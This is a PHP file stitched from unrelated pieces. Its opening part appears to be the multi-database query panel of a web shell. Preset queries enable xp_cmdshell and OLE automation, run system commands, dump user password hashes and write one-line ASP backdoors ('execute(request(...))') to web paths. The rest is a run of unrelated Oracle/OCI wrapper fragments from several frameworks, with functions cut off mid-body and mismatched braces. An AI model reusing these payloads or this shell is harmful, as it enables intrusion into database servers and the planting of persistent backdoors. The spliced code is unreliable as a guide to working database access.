<a href="?s=gg&db=ora">   Oracle  </a>
<a href="?s=gg&db=ifx">   InforMix  </a>
<a href="?s=gg&db=fb">   FireBird  </a>
<a href="?s=gg&db=db2">  DB2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td>' . "{$msrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td>' . "{$orarow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td>' . "{$ifxrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td>' . "{$db2row[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td>' . "{$fbrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ibase_free_result($fbresult);
ibase_close();
}
}
}
function query($query)
{
$this->res = $this->error = '';
switch ($this->db) {
case 'MySQL':
if (false === ($this->res = @mysql_query('/*' . chr(0) . '*/' . $query, $this->connection))) {
$this->error = @mysql_error($this->connection);
return 0;
} else {
if (is_resource($this->res)) {
return 1;
}
}
return 2;
break;
case 'MSSQL':
if (false === ($this->res = @mssql_query($query, $this->connection))) {
$this->error = 'Query error';
return 0;
} else {
if (@mssql_num_rows($this->res) > 0) {
return 1;
}
}
return 2;
break;
case 'PostgreSQL':
if (false === ($this->res = @pg_query($this->connection, $query))) {
$this->error = @pg_last_error($this->connection);
return 0;
} else {
if (@pg_num_rows($this->res) > 0) {
return 1;
}
}
return 2;
break;
case 'Oracle':
if (false === ($this->res = @ociparse($this->connection, $query))) {
$this->error = 'Query parse error';
} else {
if (@ociexecute($this->res)) {
if (@ocirowcount($this->res) != 0) {
return 2;
}
return 1;
}
$error = @ocierror();
$this->error = $error['message'];
}
break;
}
return 0;
}
/**
* return sql error array
* @access private
*/
function _sql_error()
{
$error = @ocierror();
$error = !$error ? @ocierror($this->query_result) : $error;
$error = !$error ? @ocierror($this->db_connect_id) : $error;
if ($error) {
$this->last_error_result = $error;
} else {
$error = isset($this->last_error_result) && $this->last_error_result ? $this->last_error_result : array();
}
return $error;
}
/**
* This function will connect to the database, execute a query and will return the result handle.
*
* @param $sql The SQL statement to execute.
*
* @returns Handle to the result of the query.
*
* @internal
*/
function _connectAndExec($sql)
{
$this->_logSql($sql);
$this->connect();
$stmt = OCIParse($this->_conn, $sql);
if (!$stmt) {
$error = ocierror($stmt);
trigger_error($error['message'], YD_ERROR);
}
$result = @OCIExecute($stmt);
if (!$result) {
$error = ocierror($stmt);
if (!empty($error['sqltext'])) {
$error['message'] .= ' (SQL: ' . $error['sqltext'] . ')';
}
trigger_error($error['message'], YD_ERROR);
}
return $stmt;
}
function sti_oracle_get_data($connection_string, $data_source_name, $query)
{
$info = sti_oracle_parse_connection_string($connection_string);
if ($info["privilege"] == "") {
$conn = oci_connect($info["user_id"], $info["password"], $info["database"], $info["charset"]);
} else {
$conn = oci_pconnect($info["user_id"], $info["password"], $info["database"], $info["charset"], $info["privilege"]);
}
if ($conn === false) {
$err = ocierror();
return "ServerError:Could not connect {$err['message']}";
}
$query = sti_parse_query_parameters($query);
$stmt = oci_parse($conn, $query);
if ($stmt === false) {
$err = oci_error($conn);
return "ServerError:Parse Error {$err['message']}";
} else {
if (strpos($query, "cursor") !== false) {
$curs = oci_new_cursor($conn);
oci_bind_by_name($stmt, "cursor", $curs, -1, OCI_B_CURSOR);
}
if (oci_execute($stmt, OCI_COMMIT_ON_SUCCESS) === true) {
if (isset($curs)) {
if (oci_execute($curs, OCI_DEFAULT) === false) {
$err = oci_error();
return "ServerError:Cursor Execute Error {$err['message']}";
}
$stmt_curs = $curs;
} else {
$stmt_curs = $stmt;
}
$ncols = oci_num_fields($stmt_curs);
$column_names = array();
$column_types = array();
for ($i = 1; $i <= $ncols; $i++) {
$column_names[] = oci_field_name($stmt_curs, $i);
$column_type = oci_field_type($stmt_curs, $i);
$column_precision = oci_field_precision($stmt_curs, $i);
$column_types[] = sti_oracle_get_column_type($column_type, $column_precision);
}
$xml_output = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Database>";
oci_fetch_all($stmt_curs, $data);
for ($i = 0; $i < count($data[$column_names[0]]); $i++) {
$xml_output .= "<{$data_source_name}>";
for ($j = 0; $j < count($column_names); $j++) {
$value = $data[$column_names[$j]][$i];
if ($column_types[$j] == "base64Binary") {
$value = base64_encode($value);
}
if ($column_types[$j] == "dateTime" && strlen($value) > 0 && strpos($value, ".") > 0) {
$values = preg_split("/\\./", $value);
if (count($values) >= 3) {
if (strlen($values[2]) > 2) {
$value = $values[2] . '-' . $values[1] . '-' . $values[0];
} else {
$value = ((int) $values[2] >= 30 ? '19' . $values[2] : '20' . $values[2]) . '-' . $values[1] . '-' . $values[0];
}
}
} else {
$value = str_replace("&", "&", $value);
$value = str_replace("<", "<", $value);
$value = str_replace(">", ">", $value);
}
$xml_output .= "<{$column_names[$j]}>{$value}</{$column_names[$j]}>";
}
$xml_output .= "</{$data_source_name}>";
}
$xml_output .= "</Database>";
if (isset($curs)) {
oci_free_statement($curs);
}
oci_free_statement($stmt);
} else {
$err = ocierror($stmt);
return "ServerError:Execute Error {$err['message']} {$query}";
}
}
return $xml_output;
}
} else {
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
}
break;
case 'Oracle':
$db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
if ($error = @ocierror()) {
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>" . $error['message'] . "</b></font></div>";
} else {
$querys = @explode(';', $_POST['db_query']);
foreach ($querys as $num => $query) {
if (strlen($query) > 5) {
echo "<font face=Verdana size=-2 color=green><b>Query#" . $num . " : " . htmlspecialchars($query) . "</b></font><br>";
$stat = @ociparse($db, $query);
@ociexecute($stat);
if ($error = @ocierror()) {
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>" . $error['message'] . "</b></font></td></tr></table><br>";
} else {
$rowcount = @ocirowcount($stat);
if ($rowcount != 0) {
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>" . $rowcount . "</b></font></td></tr></table><br>";
} else {
echo "<table width=100%><tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) {
echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b> " . htmlspecialchars(@ocicolumnname($stat, $j)) . " </b></font></td>";
}
echo "</tr>";
while (ocifetch($stat)) {
echo "<tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) {
echo "<td><font face=Verdana size=-2> " . htmlspecialchars(@ociresult($stat, $j)) . " </font></td>";
function execute($sql, $inputarr = null, $throw = true)
{
if ($this->enableLog) {
$this->log[] = $sql;
log_message("sql: {$sql}", 'debug');
}
$this->querycount++;
$stmt = ociparse($this->conn, $sql);
if (is_array($inputarr)) {
foreach (array_keys($inputarr) as $k) {
ocibindbyname($stmt, $k, $inputarr[$k], -1);
}
}
if ($stmt && ociexecute($stmt, $this->_commitMode)) {
$this->_lastrs = $stmt;
$this->lasterr = null;
$this->lasterrcode = null;
return $stmt;
}
$err = ocierror($stmt);
$this->lasterr = $err['message'];
$this->lasterrcode = $err['code'];
if ($throw) {
FLEA::loadClass('FLEA_Db_Exception_SqlQuery');
__THROW(new FLEA_Db_Exception_SqlQuery($sql, $this->lasterr, $this->lasterrcode));
}
return false;
}
/**
* The error message number
*
* @access private
* @return integer
*/
function _error_number()
{
$error = ocierror($this->conn_id);
return $error['code'];
}
/**
* return sql error array
* @access private
*/
function _sql_error()
{
if (function_exists('ocierror')) {
$error = @ocierror();
$error = !$error ? @ocierror($this->query_result) : $error;
$error = !$error ? @ocierror($this->db_connect_id) : $error;
if ($error) {
$this->last_error_result = $error;
} else {
$error = isset($this->last_error_result) && $this->last_error_result ? $this->last_error_result : array();
}
} else {
$error = array('message' => $this->connect_error, 'code' => '');
}
return $error;
}
/**
* This function will connect to the database, execute a query and will return the result handle.
*
* @param $sql The SQL statement to execute.
*
* @returns Handle to the result of the query. In case of an error, this function triggers an error.
*
* @internal
*/
function &_connectAndExec($sql)
{
// Add the table prefix
$sql = str_replace(' #_', ' ' . YDConfig::get('YD_DB_TABLEPREFIX', ''), $sql);
// Update the language placeholders
$languageIndex = YDConfig::get('YD_DB_LANGUAGE_INDEX', null);
if (!is_null($languageIndex)) {
$sql = str_replace('_@', '_' . $languageIndex, $sql);
}
// Connect
$result = $this->connect();
// Handle errors
if (!$result && $this->_failOnError === true) {
$error = ocierror();
trigger_error($error['message'], YD_ERROR);
}
// Record the start time
$timer = new YDTimer();
// Create statement
$stmt = OCIParse($this->_conn, $sql);
// Handle errors
if (!$stmt && $this->_failOnError === true) {
$error = ocierror($stmt);
trigger_error($error['message'], YD_ERROR);
}
// Execute
$result = @OCIExecute($stmt);
// Handle errors
if ($result === false && $this->_failOnError === true) {
$error = ocierror($stmt);
if (!empty($error['sqltext'])) {
$error['message'] .= ' (SQL: ' . $error['sqltext'] . ')';
}
echo '<b>Stacktrace:</b> <pre>' . YDDebugUtil::getStackTrace() . '</pre>';
echo '<b>SQL Statement:</b> <pre>' . $this->formatSql($sql) . '</pre>';
trigger_error($error['message'], YD_ERROR);
}
// Log the statement
$this->_logSql($sql, $timer->getElapsed());
// Return the result
return $stmt;
}
/**
* delete a single instance
*
* @param One_Model $model
*/
public function delete(One_Model $model)
{
$scheme = One_Repository::getScheme($model->getSchemeName());
$db = $this->db($scheme);
// determine table to insert into
$table = $this->getTable($scheme);
$sql = 'DELETE FROM ' . $table;
$idAttr = $scheme->getIdentityAttribute();
$id = $idAttr->getName();
$value = $model->{$id};
$value = $idAttr->toString(mysql_real_escape_string($value, $db));
$sql .= ' WHERE `' . $id . '` = ' . $value;
// execute query
$stid = oci_parse($db, $sql);
if ($stid === false) {
throw new One_Exception(ocierror() . '<br />' . $sql);
}
$status = oci_execute($stid);
if ($status === false) {
throw new One_Exception(ocierror() . '<br />' . $sql);
}
}
